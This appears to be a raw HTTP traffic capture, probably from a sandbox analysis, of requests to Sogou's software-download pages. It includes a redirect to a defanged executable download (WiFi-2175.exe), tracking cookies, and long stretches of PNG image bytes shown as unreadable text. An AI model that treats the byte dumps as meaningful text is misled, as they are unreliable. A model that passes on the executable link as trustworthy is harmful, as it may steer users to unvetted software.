Content-Type: text/html; charset=utf-8
Content-Length: 140
Connection: keep-alive
Set-Cookie: usid=1IstgWf2O_cQ41s1; path=/; expires=Fri, 19-May-17 07:13:07 GMT; domain=.sogou.com
Set-Cookie: ABTEST=0|1463641987|v1; expires=Sat, 18-Jun-16 07:13:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUV=004D48F6C2F260DA573D67833DE92580; expires=Wed, 14-May-36 07:13:07 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou
Set-Cookie: wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=; domain=.sogou.com; path=/; expires=Sun, 19-May-2019 07:13:07 GMT



GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/5632829225944923461.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:18 GMT
Content-Type: image/png
Content-Length: 8510
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:27:38 GMT
Expires: Thu, 19 May 2016 13:27:38 GMT
Cache-Control: max-age=86400
ETag: e47f9757865c3d4ac672023a3c8188b9
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: bjzw_40_33
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME......%..p... -IDATx...w.U....k.}....D.J......P.F.`...Q.`G.I&...
...L.Q...c...*:vl..(RTD@)"\............^N...s..>....}.^.o.....I.of.
.K....<............].....5@%..X.....>..W...._.4.x...$.&.W.C..p"p
1p8...{a....x.. 0..!$....3........|<..`.2....&".....0..;.......<
J.A.4&A(.&.w...;[email protected]$P.R.c...>._t...w! ....k.3
...5....4...B............]h...v....i2.8...V.Xd...<.%....H.......3.%
.5.z....#..5.w|....x.q.}...H..?...5.w6..LG..&....y..~H..wJ.,...V....C`
$Z..._..4-.z[C.J..<\....([email protected]\G...u..k.r.7.:..$...........S..o.z
......h-......JA..EncaZ.B.@......!.....}7$..n...`.....~.p6.7K........l
E$.....t~.by..A...A=a.^.~..w.E.r.]....]K.......H.(h..!n.m..z....5..*.R
m.T._o.u.....v.BM...K.J..`.9,..)!.,p>..F.S....]...Sy\....dtw-.^]`D_
.....vS.....*v...V..-.`T..2C...._l...1..hX...r.a[.T...J.............`.
[email protected]..]K`PO.8T1i.........Z.Q.a...q.2..B"....5.?.m...G.P...]E
..\....>.J..j../[email protected]!j..8.C.~.....q........K..a..F ...
..!..%;...9.....djn[...1,!..7.....L...:FL.-...j......b..kCM...."i..m.s
...........Ug.;..>T....3Pq.8......].$...V..............61.._ex.c.sK
..m4..J..l.{.f.W.~3c..../.....o.i.w9L..p.d.Qc........w:.L..w..\....5..
o...fK...%E...J..~3c.H%OAaG|m....}[email protected].${.........!.....F
...h.[.Y.IH...u.......ra~.....bA.....P.|....;.:N....t..V.y....BHfc..&g
t;...j......{..,Yo(..pl........'\G,...0./.8...C...E...hO....T..;F.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3726774318030095000.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:19 GMT
Content-Type: image/png
Content-Length: 12563
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 11:43:11 GMT
Expires: Thu, 19 May 2016 11:43:11 GMT
Cache-Control: max-age=86400
ETag: 3169601c33a2e22251f0eb2993875a23
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_27_101
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME..... .r.....0.IDATx..}y.%Uu...{.^.....W...a.d1...5*A.%.h..DMb4.
&q..".\.~.qGE../..,.......L..===..............u.{..._...t.....=.]..DK.
DK.DK.DK.DK.DK.DK.DK.DK.DK.D......X4.....ry...C....y......z.k.(.......
.....n.^...)HJ.h....P...p........q..}.z..5...BF..E.....a....m...0.....
........t....J.;b....A....k1..1 }-0.^`...?PX.iAY.R...6..g.....o... u..
y.Z..c..}@4..#-.. ....z...q....e..?,.|2P.$.Xk..BY......c...|?.{..yJ..m
....E......c..-#%[..-........5........2|..>6....3..?.G.......$.}b.v
.%..9$}..|c......y...fx....=.z/y....!..D........O..:.../?n ..g..I*b.h.
j.3"......0Q..&k....s...G...]..(...........h.N..#;..;56.....<...)..
F.F.< a... ^.Z....O..........cS..?.}...'.'...N..y...^a......R.$... 
..... 3..u.).!....L.c.. ....x..]...zO.%.../..~.....[.l.f.....-..O...@:
....(.^x..t.......tu....-i......B*.6 .y......ERJH).`......U1.....,..}.
..Dd........p..{E..^....foB[.....ia..?...%.ll.......^X...^..`..@([.%..
....#.P2..H....FR......Y.a...@<.3..7{]....F.r]..Bi...........q .%..
.........../[email protected]*.ON.y..sle)..Y3.!&....B2}v.....
b0...(..n)W.....AKb.P.P...|....O......?.>..i)."../.@:....rjI.....U,
..X.b60.,8P...:>...>.....]...B..).....@.."...`i)................
...$....R......'.z...].O.......v.l.'.}.f.B2..gU.O....'...!/...........
c}.......J...W.y^........F#..EW..#)..:....KD.....CW....G... .....o... 
..Q..(?...g.....pl. .........?......Y.A.(L.3....I...lI.-Ki.M...Ht.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4871856506745242874.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:19 GMT
Content-Type: image/png
Content-Length: 24324
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:29:26 GMT
Expires: Thu, 19 May 2016 13:29:26 GMT
Cache-Control: max-age=86400
ETag: 8bd7b2a57dd3e8f0f499881386784adf
X-YunTu-Ipt: 0.021000146865845
X-Yuntu-Trace: bjzw_66_108
X-Yuntu-Trace-Proxy: zw_64_27
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME.........U...].IDATx...w.%U./.]{W.I7.......M7..Ii.......Q.4.8>
;...(..3>ELO16..).#9..4 ...............C.m...8.W~...sn.:..w}..k....
I....j....~..}..0{.,..1.0?.....7..J).(.j.....wW*...N;m..e.f...N-..U!D.
...v.'6F ...fs|..m............cc#.... `..l.....m..,C..rbb.._q.Y.v-...W
y..)...C.e..G.W...o...r..j....A..}......4g.l.!.Q.....}..G...[...C.....
..v..i..........EQEJ)...RB....a...Z.h.....j..CCC;.......oZ.v.c..^..C.=
.UF./m.............|......_........s?..y...G......k.........(J....N;..
K/....q...<.a...h..l.1.\.1.Z..?..~..hcx.......u.?..-....o~...X.|...
:..1.X.....oy.......,\..~......_..W..G.q..........t.{.........G..]3844
.J.g.Y...3_...&............J...9..a.F..........[V.^...N<..8e.......
..W.z..T*..S.L.s?...#....QG.M....k.y.[{.... ~.......G~;4<.R:7P..3.U
..V..e...N.9.0..h......]s.=7|.......{.......{.o}.....!.`...=........(.
.t..5..............o.y..m..Zi.,Ni.R.u........pf.....4..J.<|..-~....
....].j.......7.tS../...@I.`..9.nQ.y.........*.f../...|..o........jj..
.1:UZ.Z.Lk..i.....R.[..ff.N....V.Y.@_<..3m8..[Js3S.:Js......*....|.
5o..k...n....}...j...t.e.G.z....jkk......".....]...w........n.Q.......
;..k..442.. ..*.Z.2..B}...Zq3S.*..v..l..4M..l.D.......s...z...V..,e...
..2.S..N..........Xl......^w....v...J..v....>...5K..Z..'...4.......
!.......^.ZCDt..^v.?...>|..G....3f.k....l......... H ......c......k
,.....&2.O..K...Z..i ..HH...K..$T$..$0.*1...........UA..C........a
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3230604409881581210.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: image/png
Content-Length: 22878
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 14:17:44 GMT
Expires: Thu, 19 May 2016 14:17:44 GMT
Cache-Control: max-age=86400
ETag: 828822cd97deaef161e8cfc62faed5a9
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_37_26
X-Yuntu-Trace-Proxy: bjzw_91_49
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD..............pHYs..........o.d..
..tIME...... ...:..XMIDATx.....$Yr..}...G.o._..v-]....F7.@...\f8....3.
....z....y..t..H.-.0#[email protected]...@/.U...U..{.o..w.fz...{....&0.u.2~...~.5.k
..Mz?p.E......c........K:.X.!./A.@........#...oDd.e@."}b._w...>(...
.m...%\~.".g:..<...<{.....8.\..rf.|r]..}:K...r.E.Q,.._.Y.!N.(...
.R!.P.M.........z...l.h~......|)..K...Q.^.......G.OY..Xv..tH..e/.=L...
..2.,.........d......[..B8.>[email protected].._..?..2,......Z.7.I'.d.bZ~O.
..p.Z...U...W./..nP.>..(s..3E....=...t.).........6.V?..........s...
h .[.d/.x...L..'T.QM..~...*(.8g..3.\0..>*........p....<....i...q
...E0...Y.C.L..eU......(....T4.....&....../..nQ..B.......x...  ...s"'&
lt;8.!wN...r.>....z?.t..&j..x.d..wK.J/ .<[email protected]$..g..._.
..X.3......sE...c0...w.-....#E....4.;R[.......|...SG.!...>[.2......
./,.F....4...x...`^.EY.....;...1..6....Oq""....JpG..g.an.X0W...:!....N
......D.>S...R..%.g.>.FY.3.4...C...} ....x.~...l..k.3..s......Gp
...%.OY.OY...>y..?...o2..A.`..TFD.L.S.....=...I.....>f.f1/..W@..
p9.i.\........D.m...e.U}.............s...3NU.Q..b.=/.f..d`.$....p...O.
[email protected]. (...r.1..#.......q.ns.. ...Q.!.._...
....K.....*..D...W.0...).....([email protected]=H0Q\e.....=..
..s..!...D...LI.h.m.J[....9..r..;.J%^.z..........?`.. ......l.yV..'b^.
..3...........E..K....d....".,.F}.....mI....3.2Y.....6.8.....!KJO..p.l
*J....5.I......'..1...)K..........4.6b;T..I....~.c....k.N..0.6'UF.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-7654919934142823378.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: image/png
Content-Length: 28304
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:29:13 GMT
Expires: Thu, 19 May 2016 13:29:13 GMT
Cache-Control: max-age=86400
ETag: 3c76a6890a22b2f8b6361bed2bc94d82
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_66_108
X-Yuntu-Trace-Proxy: tc_212_43
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME.........O...m.IDATx...w.m.}..........z....%K.e....v....$3.!$...
...0...R.0I....I.b .....*K...'....r{9}..~.........NB..>.sO....~....
.?|..""..........I.y?.#"....3.z...u.....e...=.......7...F ...$.Q..{.{/
......}Z..F.J.x~.S._...U-{.7.GY...X.._...y......q..{.....34lhZn.....O.
.yn$..>.....W........7...6.}..u*f.......N..c7.........5c.K.5&.z1...
..`....~..|.W....C.....3..2.T.W=...Mo..AP.'3..f.....o....Mo.........-.
...j.....K.-W....pA.].....y*..:BP...e.9....g..A..J.?....v.}..,.V.d.>
;.!.x1..P...ynpNp......4/w...s.M.....M}.....V....}._..g.Q.... s..:....
.....V.ew.<..mf.Z}....p..\6.....{.a..W...L*S.%.c). ......G....a..q.
".Da.D.....G.(.8. ....;.^-N ...|.U.&...'>~............ED.0H'.0.-..c
.V.M..;Zo.#...Z3.5.K..Y.uk9.~[..o....g.........#6i.T;...*[email protected]~]...
9U..>....7.gh....;Q.....kRSmX...L.......4O..{M.N..k:.5.:...f.P/.U.Z
HT...x. ...z..q^.A..I.v...u..4........uo....S.....k....Rd...<....g.
....7X...~.__.)!2U..7...'..Q.......:F.o=.>...C...8..=o.....J..Rk...
.(.c.!.E.El.2..Ap^5M...w.>....... ...O|..".|...!6d..G.o..........GH
6.lM6..L...[..K3...YO.....k!...o.......'x.......~s.dE.<P..:j...._x.
3_t3..[....`....".......?o...v..dj*.k-o......lm....XA.`...).1......Y.m
."......M8=..^O../F.1..WTy.Zl._u#.7....LN..QOT....g.. 7.Y%:..Sq....?m.
k.@&.b.....P...6>............2...t. V.....y.....f.......U.....$..&.
........&...kg...|msE_.......s/.?..m:U.{.........:...B...?..g..[.R
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6699374927030488929.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: image/png
Content-Length: 10697
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:47:34 GMT
Expires: Thu, 19 May 2016 13:47:34 GMT
Cache-Control: max-age=86400
ETag: 4971efb92950694d5edf95579bd5f322
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_25_38
X-Yuntu-Trace-Proxy: bjzw_16_121
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD..............tIME.....$.{`.g..(.
IDATx...y.]U}.......|3. ...9..@F."2.kQ.C...j......Sm...k.....G.-..O.A.
..2#...!..In.|..~....9..{........}>;.....Yk..............#..F.(....
[email protected].;[ s.d.7..p......t..X.EHd!...*`1..F...{H.3....g(....%
.I`.....5..,.."...N.N.N...=..D.... .f..sG.{.....9.....U!.8...*@l@...}.
p2p......_."j8P.../..0.......fm................pA..B.(..=..$..........
A'-......Q|[email protected].."..8..".p.\.c4.k..n..D..9....v....
...{..(}.7..VT.&.-..P.....#r.p...8...d..<....{* .......2.......q...
...#x.w.=A..rY%9.....5.e..rx...l....v.0.%!..7..........5~$......D.H...
.`..9I.NT*'[email protected].."....V..(..R.7.T@%.j.a."....7....m.D.....N.x......A
.6"<b....>....n.......V.. .~...@.(...........4y|#...ZTp.........
d......y#.J......s.G.M ....Uz.r.p<..q.s.p4...,*.8{Wqx ...y...e..3..
v...>..pm.."...&!J.....o^.z,.k..q.........bo..4:..5......dQJ.z]..*.
.5....X..3.GXaP..v...ht.$.....<(.,.../.........8..V. ..WhV.^s.7..i/
..........(...\....I.O...Sy.8....~..3.#....'. ..*...%....K....!2...nr.
..t..3&m*....Ys.........w0.j`J.P..k..R.`S...2......l......(.6......Y..
..ew..;.^.......`f680..l....n?...`...t=....([email protected]...
.v......*}.To...!*&h. ....X$....|...*[email protected]..^..."w.Y.|:..p......v.U
....Sk..D..s[I0..QsyH....V.c..q.....&..kB....w.....4.....l..j.<....
......'NI.f@. [email protected] 
...a..o......S.W"....@?...e..Qj.......Wy.c..C.Sy`.G.u.G...l.."&.(.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/2040683535505104749.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: image/png
Content-Length: 73015
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 02:00:22 GMT
Expires: Fri, 20 May 2016 02:00:22 GMT
Cache-Control: max-age=86400
ETag: 305aaf50d0cbf0e79c5edc87d14d0b11
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: yf_22_56
.PNG........IHDR.....................gAMA......a.... cHRM..z&.........
.....u0...`..:....p..Q<....bKGD.......X......pHYs...H...H.F.k>..
..tIME.....%...A)....IDATx...u.Ue...Z.>.Lw... .."...t.....*..b!.J.t
H..JJww....t.s.... ~.......[....3...s....W/....R9........../=(.....f..
...I5*x.x_... .$.SSn8...... ............~{D_.}o..9.....S..!s...?.0....
...=x.\9`shm...^...7...}.61.s.5..~ .N..v.r.s...i~.2...y.K6.....c.f..|.
J.r.L.&5y.D)&.e..=.T..I....e.,...m.K8.n...n..?.J....%.}r a.......]....
.3,{...Q...dT.....<x`.A x....~.W. .V....x..... .....O{%[email protected].....
...#...r^....[..]..sv...?"=G..gr.#.q....[.G.... ...,Lk).O..s..C....}.e
[.4.<.gs..?.[.]Rg'......_.....w.....#.H...s9.s..C.D>.q.m..].Ox..
..Ib.......lI..O..{......H\.{..|l|.M.....7........8...d..:Tk....n..%7$
.[>.$...~...>.. .7.0Vp.CG..C....,.......0....k.[...E...(.;..z{..
6X.Q.k...........2Q...R.:i...H.r]..-..v.........^.k0..-z.....{........
..... ..%.@.\.~.c.1.....o..r..4(.......6oS.g.*...G.7.w...E...`34d.....
.z@3G}GcG}.Z...l~vl..ZK..G.........5.&........7.u.n...y..w.;".......Lj
...no.N..9...9.`.'.s..yx.}.}..r.x....2'_:..r....?.....^.F........N3.}~
.|g.....6"..E....4~1.s..t ..v.^..h.W.3{e...,.S[.o....{...C;..b.!i..D..
..........KH...?fU..M..#........a.J._l,..CGW.M^..\,..K[R.@.].O...[&Q..
a........9E.c....o...!.n$..p.y...x3.s...%..(A4.._7.I.N..iRYZ......k;..
..k... .........5.....B|c\..i7L.(...;j...p.}..9...r...............'.b.
........$>x.I[..).......#........%..............U..]....E.......js.
....kA..]0,..".....>.z.........gS..>.|..4)Y.w.....%F.....wV.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3726774318030095000.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:23 GMT
Content-Type: image/png
Content-Length: 12563
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 11:43:11 GMT
Expires: Thu, 19 May 2016 11:43:11 GMT
Cache-Control: max-age=86400
ETag: 3169601c33a2e22251f0eb2993875a23
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_27_101
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME..... .r.....0.IDATx..}y.%Uu...{.^.....W...a.d1...5*A.%.h..DMb4.
&q..".\.~.qGE../..,.......L..===..............u.{..._...t.....=.]..DK.
DK.DK.DK.DK.DK.DK.DK.DK.DK.D......X4.....ry...C....y......z.k.(.......
.....n.^...)HJ.h....P...p........q..}.z..5...BF..E.....a....m...0.....
........t....J.;b....A....k1..1 }-0.^`...?PX.iAY.R...6..g.....o... u..
y.Z..c..}@4..#-.. ....z...q....e..?,.|2P.$.Xk..BY......c...|?.{..yJ..m
....E......c..-#%[..-........5........2|..>6....3..?.G.......$.}b.v
.%..9$}..|c......y...fx....=.z/y....!..D........O..:.../?n ..g..I*b.h.
j.3"......0Q..&k....s...G...]..(...........h.N..#;..;56.....<...)..
F.F.< a... ^.Z....O..........cS..?.}...'.'...N..y...^a......R.$... 
..... 3..u.).!....L.c.. ....x..]...zO.%.../..~.....[.l.f.....-..O...@:
....(.^x..t.......tu....-i......B*.6 .y......ERJH).`......U1.....,..}.
..Dd........p..{E..^....foB[.....ia..?...%.ll.......^X...^..`..@([.%..
....#.P2..H....FR......Y.a...@<.3..7{]....F.r]..Bi...........q .%..
.........../[email protected]*.ON.y..sle)..Y3.!&....B2}v.....
b0...(..n)W.....AKb.P.P...|....O......?.>..i)."../.@:....rjI.....U,
..X.b60.,8P...:>...>.....]...B..).....@.."...`i)................
...$....R......'.z...].O.......v.l.'.}.f.B2..gU.O....'...!/...........
c}.......J...W.y^........F#..EW..#)..:....KD.....CW....G... .....o... 
..Q..(?...g.....pl. .........?......Y.A.(L.3....I...lI.-Ki.M...Ht.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/8623308865128809051.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 15021
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 14:15:22 GMT
Expires: Thu, 19 May 2016 14:15:22 GMT
Cache-Control: max-age=86400
ETag: e8ccdb50a01d8c9e5409c595085bd85f
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_41_59
X-Yuntu-Trace-Proxy: tc_196_98
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME.....&!}:S...9.IDATx...y|U..7...Lw.!!...y.....( "...N(.jqx.?....
W.>Zmm..Hm.VPQ...E. .. ."..2.2..&..s.^......p.I.!.......a.}.....^{.
..3..^/.....G4.eB.FD.>$.`D..h.....q..D...,..........db.]..RZZ......
...._.=s.\... .....1..(J....$.p...W.<x....!{.^IQ.....S8.6 **....}..
.QI.".i.N.......*.O.H$.W_}.n...x..$:....C..]QVV.-[. ??...f.L.x..G....C
Q....^.~..7..........r.z...,EQ..c][email protected]]..../.D"E.H..
....[.t..._..2....y..<..CN5%....n.Jc..Aff&.....q...C999..W^y.Q..J..
.....k..6...paii..#..:].K..........%.Hd]ii.........k..........`...J.o.
_:....~....V.^..0..IK.,qn.W_}u...;.*--.S4..f.f.%...AD... ".>D..s.h.
.H...4..ht[ii..v..q..W_...;Z.d..H2...^....._?....l>...v.w....m.....
.C.....L..u...s   [email protected].*.........|a...s.L......-|..m....{.
.vw6.;.4M..!C..... "^XX..X...KG...?....$..#...v[@...I=b......'..]:....
.....xEE..`..!.4....9t......x...._.v.#xm..5.....]..nA.. ...!D.....k...
....k...D..x..&...........t.&.a.....~..'3....!D.....L#..p.`.....|..L.*
.l...1..p.B.......q.v.q..W...w.^.o.>........^....'...k;S...........
......D....'...........<.`..a.a.................BD...S-..!...D.).hv
...v.3...............y#....a..a.-..'...;...D.%K....7:c .....h.....|S..
.LAd..D.....0...w..!.7.l..Q^.d.#".~..g.6HOO...?."......@&",[.lt(.Z....
..T.~!.t.(f...(.#:R ...1.xO=......y5......y.....V~UK......(.E..B7M..'z
}...B....-.MD..{.l.&#"<...HOO.09u. x..ax..g0`..l..A.={.`...w...
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/1882834511144817344.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 21518
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 06:34:31 GMT
Expires: Fri, 20 May 2016 06:34:31 GMT
Cache-Control: max-age=86400
ETag: d37b153bda413229fc007dd3baa327d1
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_56_115
X-Yuntu-Trace-Proxy: tc_192_123
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME.....$.i.....R.IDATx...w.lYU..]{.s*=..KG:.."..iI"*...`B1....2...
q..*/.....g.}.0..f...D2...t.}.o|..........'T=..n...}.~.>.....9{..[.
..........z.<..S..ALO..8.)";..'.)...p..*gP!Ra.a"JQ.O..`..F....~....
......@A.. ..B....aa*20...}......=..~.<.1.....b....TN<.(...p|.%.
x.M..o.l........c..m9..........A>..?.'.......`...........!Y.i.s ...
.".."........`"`.....!.g.....Kw..5q..9.......Q.H.{?........S..j.......
?.0~...;...S....O.0.N...GV.u... nz.....'....Z..s\<v\g.@.....@_@8u..
